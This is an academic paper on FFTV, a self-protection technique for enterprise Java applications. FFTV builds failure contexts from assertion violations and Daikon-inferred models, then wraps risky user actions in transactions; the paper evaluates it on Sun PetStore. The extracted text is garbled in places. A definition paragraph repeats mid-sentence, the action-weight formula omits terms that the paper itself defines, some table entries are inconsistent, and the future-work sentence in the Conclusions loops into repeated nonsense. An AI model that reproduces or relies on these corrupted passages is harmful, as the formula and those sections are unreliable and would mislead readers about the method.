In this paper, we propose a self-protection technique, called FFTV (From Failures To Vaccine), that increases reliability of enterprise applications by capturing the context of observed failures, and preventing failures of the same type from occurring again. Initially, FFTV monitors system executions, extracts information related to failures, and creates models that describe the context of failures, that is the sequence of events that led to failure. Successively, FFTV matches executions with failure context models. When FFTV identifies an execution that matches a failure context, it activates suitable protection mechanisms that either prevent the system from failing or heal the problem and enable the successful termination of a running functionality that
would fail otherwise. In this paper, we use transactional services to dynamically encapsulate dangerous executions into safe execution contexts, in order to prevent loss of data or reaching faulty states. The technique proposed in this paper resums the application into a “safe” state, that is a state that allows users to continue interact with the system.
FFTV is not an alternative to failure-specific and general mechanisms, but it complements the set of problems dealt by existing techniques. Failure specific mechanisms prevent failures related to exceptional events that can be predicted at design-time. General mechanisms prevent failures that depend on general catastrophic events. FFTV prevents specific problems that are difficult to predict at design-time, but can be identified at run time by learning from program executions.
FFTV can address different classes of problems by capturing different information and distilling different models. In this paper, we exemplify the approach by referring to problems caused by unexpected data values passed between components or assigned to state variables.
The paper is organized as follows. Section 2 presents the overall approach. Section 3 illustrates the design-time activities required to develop FFTV-enabled systems. Section 4 describes the generation of models used to identify unexpected values. Section 5 shows how to build failure contexts from observed failures. Sections 6 and 7 detail the techniques for analyzing and detecting failures that comprise the building of failure contexts. Section 8 shows how transactional services can be used to implement protection mechanisms. Section 9 presents early experimental results obtained by applying FFTV to prevent a specific class of faults injected into the Sun PetStore enterprise system. Section 10 discusses related work, and Section 11 presents conclusions.
2 FFTV: From Failure to Vaccine
FFTV monitors system executions, identifies contexts associated with observed failures, that is the conditions under which the system failed, and activates mechanisms to protect the systems when executions match failure contexts.
Figure 1 illustrates FFTV. At design-time, developers define the fault types addressed by FFTV, and design oracles that detect these faults. Oracles are then compiled into the target system. Fault types and oracles can be specified manually, for instance, by specifying assertions [19], or derived automatically from specifications, for instance, by compiling high-level properties into code-level assertions [13]. Once oracles have been defined, FFTV uses static analysis techniques to automatically identify the program points that can affect the properties defined by the oracles. These program points are monitored at testing-time to extract information about successful executions, that is executions that pass the checks computed by oracles.
In this paper, we instantiate the technique on state-based faults, that is faults that depend on executions that erroneously change the state of the execution, and then use the corrupted state, leading to a failure. To capture these faults, we use JML assertions to write oracles that can identify unexpected values [16], and def-use analysis to identify the state variables that can affect the evaluation of existing assertions [12]. So far, we have generated assertions manually, but we are working on automatic generations of assertions from specifications.
At testing time, FFTV records the information flowing through relevant program points, and stores the data extracted from executions of successful test cases into a repository. After the testing sessions, FFTV uses these data to automatically derive models that represent in a compact and general way properties related to relevant program points.
In this paper, we apply FFTV by recording values of the state variables identified by data-flow analysis, and we use Daikon [7] to infer general relations, expressed as Boolean expressions, between these state variables. Column Models in Table 1 shows examples of properties that can be automatically inferred with Daikon.
At run-time, FFTV analyses failures, and detects executions that may lead to failures of the same type, that is, it identifies both the causes of failures (failure analysis), and the executions that can likely lead to failures similar to the identified ones (failure detection).
Failure analysis is based on failures detected by oracles. The observer analyzes the data monitored at relevant program points, and compares these data with the models built at testing time, in order to identify the causes of experienced failures. The analysis produces failure contexts, which are used to identify situations that will likely lead to failures of the same type of those experienced in the past. The types of failures that are addressed by failure contexts depend on inference engines. In this paper, we detect failures that derive both from state-based faults, that is unexpected values assigned to variables, and from interface problems, that is unexpected values assigned to parameters. In both cases, we detect unexpected values with Boolean expressions.
During normal system execution, FFTV compares the data monitored at relevant program points with the recorded failure contexts. If the execution matches a failure context, FFTV activates protection (or healing) mechanisms to prevent system failure, thus increasing the dependability of the software system.
In this paper, we design protection mechanisms for software systems that implement the MVC design pattern, a widespread adopted pattern for designing three layered enterprise systems [23]. In the MVC design pattern, each action that can be executed by users is clearly represented with an individual entity (usually a class or a method).
We protect these systems by encapsulating dangerous executions within transactions (transaction services are always available in J2EE compliant application servers and are widely adopted in enterprise systems in general [14]). According to MVC, we identify the stable states as the states of the system between the execution of consecutive actions. When FFTV identifies the execution of actions that can lead to system failures, it dynamically embeds potentially dangerous actions within a transaction. If the software system fails, FFTV resumes the system execution from the last saved stable state, thus missing the failing transactions but allowing users to continue interact with the system and execute other actions. Users who perform the same action again, will experience similar detect-resume interactions.
The FFTV approach can be instantiated with different techniques at design, testing and run-time, to capture and heal different types of failures. We are currently investigating finite state machines and temporal logic as oracles to dynamically capture component integration problems, inter-component invocations as relevant program points, finite state machines inferred with kBehavior [18] as model for interactions, and equivalent scenarios as healing technique [4].
3 Oracles and Relevant Program Points
Oracles check the properties selected by developers according to the criticality of the components, the complexity of the implementations and the importance of the functionalities. For examples, in the case of a functionality that registers new users into the system, oracles can verify that at least user name and password are correctly recorded in the database.
In this paper, we consider oracles specified as code-level assertions [6], which are particularly well suited to reveal failures that depend on wrong values of state variables and parameters. We use the Java Modeling Language (JML) [17] to indicate the conditions over program variables that are expected to hold at run-time. JML annotations are Java comments prefixed with @. Line 37 of Figure 2 shows an example of JML assertion that specifies that the return value of method getTotalCost must be greater than 0 (@ensure /result > 0). When an assertion is violated, a generic AssertionException is thrown.
We detect failures that depend on both violations of user-specified oracles, and uncaught exceptions. Since we expect that no exceptions should be observed by the controller of a MVC-based system, we treat all exceptions observed by the controller as failures.
Given a set of JML assertions, we automatically analyze the application to identify the relevant program points that can influence the oracles. We then instrument the identified points to extract the information needed for identifying failure contexts. We identify the program variables that can impact the evaluation of the expressions computed in JML assertions by means of data-flow analysis [12]. If a statement s assigns a value to a variable v, we say that s defines v; if a statement s references to a variable v, we say that s uses v. If there exists an execution path p from a statement s_1 that defines variable v, to a statement s_2 that uses the same variable v, and no statements in p (with the exception of s_1) define v, we say that p is a definition-clear path with respect to variable v and (s_1, s_2) is a definition-use pair for v. A sequence (s_1, s_2, s_3, . . . , s_k), where each pair (s_i, s_{i+1}) is a definition use pair, and in node s_{i+1} the use of variable v_i influences the definition of variable v_{i+1}, is a definition-use chain of length k [11, 10].
Given a variable v and a statement s where v is used, we denote with chain^v_k(s) the set of all definition-use chains (s_1, s_2, . . . , s_{k−1}, s). Given a definition-use chain c = A sequence (s_1, s_2, s_3, . . . , s_k), where each pair (s_i, s_{i+1}) is a definition use pair, and in node s_{i+1} the use of variable v_i influences the definition of variable v_{i+1}, is a definition-use chain of length k [11, 10].
Given a variable v and a statement s where v is used, we denote with chain^v_k(s) the set of all definition-use chains (s_1, s_2, . . . , s_{k−1}, s). Given a definition-use chain c =
invocation chain
use
def
Legend
Hyperedges relate definitions and uses. Hyperedges are graphically identified with arrowhead patterns. Def-use chains can be obtained by recursively following hyperedges.
Figure 2. An example of program with an assertion and a def-use chain.
\( (s_1^{v_1}, s_2^{v_2}, \ldots, s_k^{v_k}) \), we use \( \text{stat}(c) \) to denote the set of all the statements included in \( c \), that is \( \text{stat}(c) = \{s_1, s_2, \ldots, s_k\} \). Given \( v \) used in statement \( s \), \( \text{stat}_k^v(s) \) is the set of all the statements, up to a depth \( k \), that may influence the value of \( v \) in \( s \), that is \( \text{stat}_k^v(s) = \bigcup_{c \in \text{chain}_k^v(s)} \text{stat}(c) \).
Given a JML assertion \( J \) and variables \( v_i \) used in \( J \), the set of statements that may influence the value of \( v_i \) is given by \( \text{stat}_k^{v_i}(J) \). The set of relevant program points associated with \( J \) is given by \( \bigcup_{v_i \text{ used in } J} \text{stat}_k^{v_i}(J) \), where \( k \) is a parameter. Large values of \( k \) provide higher coverage of relevant program points.
Let us consider for example the assertion \( \text{result} > 0 \) associated with method \( \text{getTotalCost} \) shown in Figure 2. The definition-use chains of length 3 for this assertion are indicated by hyperedges that relate definitions and uses of variables. The set of relevant program points can be obtained starting from the assertion \( \text{result} > 0 \) and selecting the program points reachable by following the hyperedges. In this example, the set of relevant program points is the set of statements at lines 4, 5, 9, 11, 23, 25, 26, 29, 30, 33, 34, 39.
4 Model Generation
At testing time, test designers execute test suites and collect data from relevant program points. To generate models of successful behavior, we consider only the data obtained from successful executions of test cases. The type and amount of information extracted by FFTV depend from both the considered types of failures and the technologies used to prevent the failures or heal the related faults. In this paper, we extract information from relevant program points by recording the values of the variables when they are defined both before and after the execution of a relevant program point, and the values of the variables when they are used before a relevant program point.
FFTV automatically produces general models of the observed behaviors from the data collected during testing. When executing the deployed application, FFTV uses these models to identify executions that differ from the behavior observed at testing-time, and thus deserve further attention. In this paper, we produce general models of the observed behavior with the Daikon inference engine [7], which can identify relations between sets of variables at given program points. Properties are expressed as Boolean expressions. The models produced by FFTV represent relations of values observed during execution, thus the accuracy of the models depend on the quality of the test cases, which roughly correspond to the coverage of the execution space. According to our early experience, a well design set of test cases generates accurate models of the software system.
Let us consider, for instance, the program point at line 25 in the class \( \text{Item} \) shown in Figure 2. Daikon can infer properties like \( \text{item.quantity'} \geq 1 \) and \( \text{item.quantity'} = \text{qty} \). The former property specifies that the final value of the quantity is always greater or equal than 1, while the latter indicates that the final value of quantity corresponds to the value of variable \( \text{qty} \).
5 Failure Contexts
When running in the field, FFTV monitors the values of the variables at relevant program points, identifies anomalous values, which are values that violate models derived at testing-time, detects failures by means of oracles, and indicates when actions start and finish.
When a new type of failure is observed, FFFT computes its failure context, that is the sequence of events that led to the failure. The failure context cannot prevent the first occurrence of the failure, but can be used to detect future occurrences of events that may lead to other failures of the same type, and prevent further failure occurrences.
6 Failure Analysis
When oracles reveal failures, the information extracted from controllers at relevant program points is used to automatically build failure contexts. Failure contexts capture the anomalous run-time conditions that occurred before the observed failures. In this paper, we generate failure contexts by using both the sequence of the last \( k + 1 \) actions (action \( k + 1 \) is the one that cannot be successfully completed because it generates a failure) and the anomalous values that are detected at relevant program points (\( k \) is a parameter of the technique).
The rationale is that many failures occur within executions that are characterized by particular combinations of actions and data values. Thus, by examining the last \( k + 1 \) actions, we can detect a set of unexpected events related to a type of failure experienced in previous executions. Aim of FFFT is not to capture either the exact source of failures or the complete sequence of events that lead to a failure, but to identify few anomalous values that are usually observed before the occurrence of a failure. These values are used as failure predictors.
As illustrated by the example in the next subsection, we use non-disruptive prevention and healing strategies. Thus, false positives, that is sequences of events that are wrongly identified as potentially leading to failures, do not introduce additional failures. However, false positive introduces overhead caused by the unnecessary activation of prevention and healing mechanisms, thus it is important to reduce the amount of occurrences of false positive, to avoid performance problems. We solve the problem by introducing a confidence threshold \( \text{conf} \) that estimates the quality of failure contexts and allows us to discard low quality contexts. When the percentage of false positive identified by a given failure context exceeds \( \text{conf} \), we consider the context not relevant and we discard it. We record deleted failure contexts to avoid their re-instantiation.
The use of a limited window of size \( k + 1 \) to identify events that can be included into failure contexts allows for several optimizations. In particular, the observer needs only to preserve information about the last \( k \) actions, and each time a new action is observed, information about the oldest can be discarded. In presence of a reasonable amount of available memory and with a limited \( k \), the observer can work by keeping run-time data on primary memory only, without accessing secondary memories, and thus with small overhead.
FFTV generates failure contexts from failures, the last \( k + 1 \) actions and corresponding model violations in three steps. In the first step, FFFT summarizes the sequence of the first \( k \) actions (the action that produces the failure is not considered) and the corresponding model violations with an annotated FSM. For example, Figure 3 shows the annotated FSM corresponding to the sample execution presented in Table 1. Transitions represent actions and annotations indicate the models that have been violated by the corresponding action. Note that only actions that refer to program points occur in failure contexts. Actions that do not refer to program points are excluded since they do not contribute to the failure.
Annotated FSMs represent executions at the granularity of actions, and detect anomalous events at the granularity of program points. Specifying actions as labels of FSM transitions abstracts from low level details, such as sequences of method executions, that would introduce useless details in the model. Using program points as indicators of violations, such as unexpected variable values, captures low level faults, even if the model focuses on high-level information.
Figure 3. The annotated FSM associated with the failure shown in Table 1
In the second step, FFFT augments the annotated FSM with weights that indicate the relevance of the transitions (actions and corresponding violations) with respect to the identification of a failure. We assign weights by following these rules:
- actions associated with no violations are likely not to contribute to failure contexts, thus they are assigned a low weight equals to 1.
- in general, anomalous values do not generate a single model violation, but cause several model violations across different actions. Actions associated with model violations that occur early in the sequence are usually more important than actions associated with model violations that occur late in the sequence, because late anomalous values are often caused by anomalous values generated early in the execution sequence. The following formula assigns to actions with anomalies a weight proportional to the occurrence of the actions in the sequence of anomalous actions, by considering both homogeneous and heterogeneous actions:
<table>
<thead>
<tr>
<th>Action</th>
<th>Method</th>
<th>Variables traced at program points</th>
<th>Models</th>
<th>Violations</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td></td>
<td><strong>Boolean expression</strong></td>
<td><strong>ID</strong></td>
</tr>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P3.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td>Remove item</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>GUI.updateItem</td>
<td>P9.quantity</td>
<td>1 <= P9.quantity <= 13</td>
<td>P9.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P9.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>UpdateItemAction.<init></td>
<td>P8.quantity</td>
<td>1 <= P8.quantity <= 13</td>
<td>P8.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P8.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>1 <= P2.quantity <= 13</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P2.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P5.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P5.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Purchase item</td>
<td>ShoppingCart.getTotalCost</td>
<td>P1.totalCost</td>
<td>P1.totalCost < P1.totalCost'</td>
<td>P1.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.quantity</td>
<td>P1.quantity <= P1.totalCost'</td>
<td>P1.2</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.price</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.totalCost'</td>
<td>...</td>
<td>...</td>
</tr>
</tbody>
</table>
**Legend**
The table shows an observed execution that reveals a failure. A user executes the sequence of actions indicated in the first column of the table: starting with AddItem, and terminating with PurchaseItem. Column Method indicates the methods with relevant program points that are called while executing the corresponding actions (the methods are either directly executed by the action, or invoked by the View after the last action has been completed and before the next action is executed.) The program points considered in this example are obtained from a single assertion placed in method getTotalCost, as shown in Figure 2. The third column indicates the program points and variables related to methods shown in column 2. For instance, the method GUI.addItem includes two program points P6 and P7. Program point P6 traces the value of the variable `quantity` and program point P7 traces the value of the variable `price`. Column models indicates the models that have been derived from variables traced at program points. Column ID provides a unique name to each model. The last column Violations indicates the models that are violated by the considered execution, and the values that violate the models.
In summary, this table shows an execution of the sequence of actions AddItem, RemoveItem, UpdateItem, AddItem, AddItem, PurchaseItem, where action UpdateItem violates models P9.1, P8.1, P2.1 and P10.1, the last two addItem actions violate model P10.1 and action PurchaseItem violates both models P1.1 and P1.2 and the assertion in method getTotalCost.
Table 1. Example of run-time data for a shopping cart application
\[
w = \frac{200}{k^{diff} + k^{same}}
\]
where
- \(k^{diff}\) is a reduction factor that indicates the relevance of an action based on the early presence in the sequence of actions of different type associated with model violations
- \(k^{same}\) is a reduction factor that indicates the relevance of an action based on the early presence in the sequence of actions of the same type associated with model violations
- \(n^{diff}\) is the number of actions associated with model violations that both differ from the current action and have been executed before the current action
- \(n^{same}\) is the number of actions associated with model violations both of the same type of the current action and have been executed before the current action.
Assigning large values to parameters \(k^{diff}\) and \(k^{same}\) increases the relative relevance of actions associated with model violations depending on how early they occur in the sequence compared to other actions associated with model violations, while values close to 1 do not discriminate the relevance of the violations. In general, \(k^{same} > k^{diff}\), because repeated observations of actions associated with the same model violations are likely to be repeated observations of the same problem, which usually have a small impact on the whole failure context.
For instance, with values \(k^{diff} = 2.5\) and \(k^{same} = 5\), we generate the weights shown in Figure 4 for the FSM shown in Figure 3.
\[
w = \frac{200}{k^{diff} + k^{same}}
\]
Figure 4. The weighted FSM associated with the failure shown in Table 1
7 Failure Detection
Failure contexts include sets of actions, either associated with anomalous values or not, that have been recorded before a failure and are likely to be related to the failure occurrence. Each failure context is associated with an activating action. Whenever FTV detects an activating action \(a\) during the execution of the system, it compares the last \(k\) actions that have been executed before \(a\) with all failures contexts that include \(a\) as activating action. If a failure context indicates that the execution of \(a\) can cause problems, suitable healing or prevention strategies are activated. FTV checks for the presence of a potentially failing execution when the execution of an activating action is requested by the user, but before the action itself is executed, and thus before the possible failure.
Failure contexts can be checked by measuring the number of actions in the contextual events that have been executed within the last \(k\) actions. We consider an action in the contextual events as executed when both the name of the action and at least \(cov\) of its anomalies, i.e., the set of violated models, match (\(0 \leq cov \leq 1\) indicates the minimum values for the ratio between the number of executed anomalies and the total number of anomalies to be executed). In our early experiments, we set \(cov\) to 0.8. For instance, if we consider the failure context shown in Figure 5, and we consider the execution AddItem AddItem AddItem UpdateItem PurchaseItem, and only UpdateItem generates the anomalies P2.1, P8.1, P9.1 and P10.1, we executed 2 out of 4 actions. The weights of the 2 executed actions is \(1 + 100 = 101\).
We do not require the complete matching of a failure context because failure contexts include both useful information and "noise", that is actions that are not directly related to the failure. We usually activate a failure context even in presence of the execution of a small fraction of the actions occurring in the context. This approach is facilitated
by the use of non-disruptive healing/prevention strategies, which do not cause additional problems in presence of false positives. The matching of a failure context is measured by weighting the actions as follows:
\[
\text{coverage} = \frac{\sum_{a \in \text{covered action}} w(a)}{\sum_{a \in \text{failure context}} w(a)}
\]
where \(w(\text{action})\) indicates the weight of the action in the considered failure context. We match a failure context when the matching measured with the formula above is beyond an activation rate threshold. We usually set activation rate = 0.5, because executing half of the weighted actions occurring in a failure context indicates that either actions that correspond the most important anomalies or many anomalies with low weights have already occurred. For instance, the 2 actions executed by the example execution above provide a matching measure of \(\frac{101}{184} \approx 0.55 > 0.5\); thus, FFTV activates the failure context. While, an execution sequence addItem, addItem, removeItem, PurchaseItem, with actions that generate no violations, includes 1 action only with a total weight of 1. The matching level is \(\frac{1}{184} = 0.01 < 0.5\), thus FFTV would not activate the failure context.
Our technique depends on 5 parameters: \(k, k_{\text{diff}}, k_{\text{same}}, \text{cov}\) and activation rate. We provided default values for all parameters. Fine tuning the parameters according to empirical evidences is part of our ongoing research work.
In addition to matching-based identification of failure contexts, which considers the number of actions with anomalies that are executed, as illustrated above, but does not consider the type of violations, we use an identification technique based on the type of anomalies. In particular, given a failure detected by a violation or a caught exception, we identify a set of violations that are strictly related to the failure. For instance, in the case of failures revealed by capturing NullPointerExceptions, relevant violations are given by models violated with null values. In the case that any of the actions in a failure context is violated with a relevant violation, the failure context is activated, independently from the matching. This mechanism supports identification of specific problems that are usually caused by particular values assigned to variables. The definition of relevant violations can be generalized to other exceptions and assertions. For instance, it is possible to relate the OutOfBoundException to assertions that limit the range of values assigned to a variable. We have currently defined this mechanism only for the NullPointerException. Generalizing this strategy to other exceptions and assertions is part of future work.
8 Prevention Mechanisms
In this paper, we implemented a non-disruptive prevention mechanism by using the transaction service available in J2EE application servers. We extended the controllers of enterprise systems in the following way: When actions are executed, controllers ask the observer to identify potentially dangerous actions, that is actions that activate failure contexts. If the observer does not identify the action as potentially dangerous, the action is executed normally. If the action is identified as potentially dangerous, the controller initiates a transaction before executing the action normally. If the action is executed successfully, the transaction is simply committed, with limited impact on on system performance. If an oracle identifies a failure, the system propagates an exception of type AssertionException to the controller, which rollbacks the execution to a correct state, and suitably warn the user. The scope of transactions activated to prevent failures matches execution of single actions identified as dangerous. The mechanism recover from failures, and users can continue working with the system.
9 Early Validation
We validate the FFTV approach by measuring the ability of the technique to generate failure contexts for a specific class of problems: failures caused by unexpected values that are processed by enterprise systems, either because the application erroneously accepts incorrect inputs from users or because of corrupted data in databases. We focused on this class of problems for the initial validation because enterprise systems with complex user interfaces and input from external sources often suffer from such problems.
We conducted the first experiments with the Sun Petstore enterprise system version 1.4 [24], a sample application developed by Sun Microsystems to demonstrate the features of J2EE 1.4 application servers. The Sun Petstore implements a classic web shop that includes functionalities like user authentication, cart management, catalog browsing and administration. We designed 8 assertions that check for the correctness of the data used to ship orders. To evaluate the capability of FFTV to create failure contexts for the considered class of faults, we removed all consistency checks on both input values and data extracted from the database. We executed the Sun PetStore with test cases that focus on boundary or incorrect inputs, for instance, test cases that add users with incorrect shipping addresses, buy negative quantities of items, and insert incorrect values in the database. We revealed a total of 9 failures. FFTV captured all these problems by creating 9 suitable failure contexts. In one case, FFTV recovered from a failure not easily revealed with classic approaches, in fact the total cost of items in the cart is always displayed as a positive value, even when is a
negative number. Thus, users cannot distinguish carts with negative prices from carts with positive ones, by simply inspecting the output.
The early validation also highlighted the effectiveness of def-use chains to select relevant program points. In fact, def-use chains automatically identify actions that may appear unrelated but can interfere during system execution, for instance, action addItem generates information relevant for the successful execution of action PurchaseOrder. Moreover, def-use chains automatically discard actions that are not related from the execution viewpoint, even if they apparently working on similar components, for instance, action getItem is not relevant for action PurchaseOrder, even if they work on similar data structures. This information is extremely useful when creating failure contexts, because irrelevant actions that can hide important actions are automatically filtered. For example, the execution of several getItem actions will never affect an addItem action in failure contexts associated with a problem in action PurchaseOrder.
The experience gained so far with the Sun Petstore indicates that the extra statements added by our technique introduce a limited overhead, not perceivable by end-users. In fact at each program point, FFTV evaluates only simple Boolean expressions; FFTV evaluates failure contexts only when the observer detects activating actions. Moreover, evaluating failure contexts consists of matching two sets of a maximum size $K$, which is fast, especially if the available memory allows for the operation to be performed without accessing secondary memory.
In this early experience with FFTV, we studied effectiveness of the technique when testers specify a limited set of focused assertions (in our investigation we focused on correctly shipping user orders). We are currently extending the validation to a wider class of faults, and we are studying the scalability of the technique to a large number of assertions.
10 Related Work
Self-protecting techniques have been widely studied for hardware systems [15, 2]. The many techniques for design for testability, Built-In Self Test and Built-In Self Repair are effective for hardware devices, but focus mostly on manufacturing faults, and are based on fault models not shared with software systems, and do not apply well to many relevant software problems.
Classic failure prevention techniques for software systems can be classified in two main groups: failure specific and general techniques. Failure specific techniques support developers in defining proper procedures to handle problems that can be predicted at design-time. Main approaches are based on the development of defensive code and design of checking mechanisms, e.g., defensive programming [29], assertions [6], self-checking systems [27] and exception handlers [21].
General techniques aim to preserve system functionalities in case of catastrophic events. The main techniques have been studied for safety critical applications by the fault-tolerance community [1]. Common fault tolerance approaches include redundancy, service relocation, and transactional services [25], to add dynamic recovery mechanisms, and rejuvenation features [26], to prevent aging problems, that is systems with a state that degrades over time potentially leading to failures.
Failure specific techniques can handle problems that can be predicted at design-time, but they cannot deal with failures difficult to predicted before deployment, such as environmental problems, for instance problems that derive from specific context of use, or configuration problems, for instance problems that derive from the integration of the application with other systems, or domain dependent problems, for instance unexpected ranges of values in a specific domain.
General techniques can deal with general catastrophic events, but cannot effectively cope with application specific problems that do not produce catastrophic effects.
Several techniques to prevent failures and design healing strategies complement the aforementioned techniques. For instance, Zachariadis, Mascolo and Emmerich defined a framework for designing mobile systems that can automatically adapt to different environmental conditions [28]. Cheng, Garlan and Schmerl defined a language that supports the definition of domain-level objectives dynamically enforced on a target system [5]. Modafferi, Mussi and Pernici defined a plug-in to add recovery mechanisms to WS-BPEL engines [20]. Several researchers outlined the idea of using external models to support adaptation and healing mechanisms, and implementing healing and prevention procedures by changing architectures and using advanced services such as transactions [22, 9].
These approaches provide ideas or framework to support definition of complex techniques, but do not propose complete prevention or healing techniques. In this paper, we present a complete technique to detect failure conditions at run time, and to prevent repeated failures of the same type in enterprise systems. Our work represents an initial step towards the definition of a complete self-prevention technique for many types of functional faults in enterprise systems.
11 Conclusions
Since Enterprise systems usually offer 24/7 services, reliability and high availability are extremely important. Classic fault-tolerance approaches can cope with catastrophic events that can be predicted at design-time, but are not effective with unpredictable environmental, configuration,
and domain dependent failures.
In this paper, we present a self-prevention technique that automatically generates failure context models, which capture execution conditions that may lead to failures, and uses these models to prevent future occurrences of recurrent failures.
Early validation shows that the technique works with limited overhead, and can effectively prevent some classes of failures - preliminary experiments have been conducted with failures that depend on incorrect users inputs, or corrupted data stored in databases.
We are currently conducting a large set of experiments to fully validate the technique and to empirically identify the scope of the approach. We are also extending the technique in several directions: Use of false positives, that is the scope of the approach. We are also extending the technique to fully validate the technique and to empirically identify the scope of the approach. We are also extending the technique in several directions: Use of false positives, that is the scope of the approach. We are also extending the technique to fully validate the technique and to empirically identify the scope of the approach.
Acknowledgment This work is partially supported by the European Community under the Information Society Technologies (IST) programme of the 6th FP for RTD - project SHADOWS contract IST-035157.
References
|
{"Source-Url": "http://www.lta.disco.unimib.it/lta/uploads/papers/lorenzoliEtAl-ISSRE-2007.pdf", "len_cl100k_base": 9707, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 35856, "total-output-tokens": 11202, "length": "2e13", "weborganizer": {"__label__adult": 0.00029015541076660156, "__label__art_design": 0.0002772808074951172, "__label__crime_law": 0.00028133392333984375, "__label__education_jobs": 0.0005841255187988281, "__label__entertainment": 5.906820297241211e-05, "__label__fashion_beauty": 0.0001323223114013672, "__label__finance_business": 0.00030732154846191406, "__label__food_dining": 0.00023055076599121096, "__label__games": 0.0005273818969726562, "__label__hardware": 0.0009126663208007812, "__label__health": 0.00033164024353027344, "__label__history": 0.00019979476928710935, "__label__home_hobbies": 6.085634231567383e-05, "__label__industrial": 0.00032019615173339844, "__label__literature": 0.0002155303955078125, "__label__politics": 0.0002014636993408203, "__label__religion": 0.0003120899200439453, "__label__science_tech": 0.0200653076171875, "__label__social_life": 5.644559860229492e-05, "__label__software": 0.0072784423828125, "__label__software_dev": 0.966796875, "__label__sports_fitness": 0.00017905235290527344, "__label__transportation": 0.0004220008850097656, "__label__travel": 0.00015652179718017578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 52103, 0.02709]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 52103, 0.41652]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 52103, 0.88436]], "google_gemma-3-12b-it_contains_pii": [[0, 4284, false], [4284, 10114, null], [10114, 14370, null], [14370, 18391, null], [18391, 23625, null], [23625, 31352, null], [31352, 34972, null], [34972, 40588, null], [40588, 46132, null], [46132, 52103, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4284, true], [4284, 10114, null], [10114, 14370, null], [14370, 18391, null], [18391, 23625, null], [23625, 31352, null], [31352, 34972, null], [34972, 40588, null], [40588, 46132, null], [46132, 52103, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, 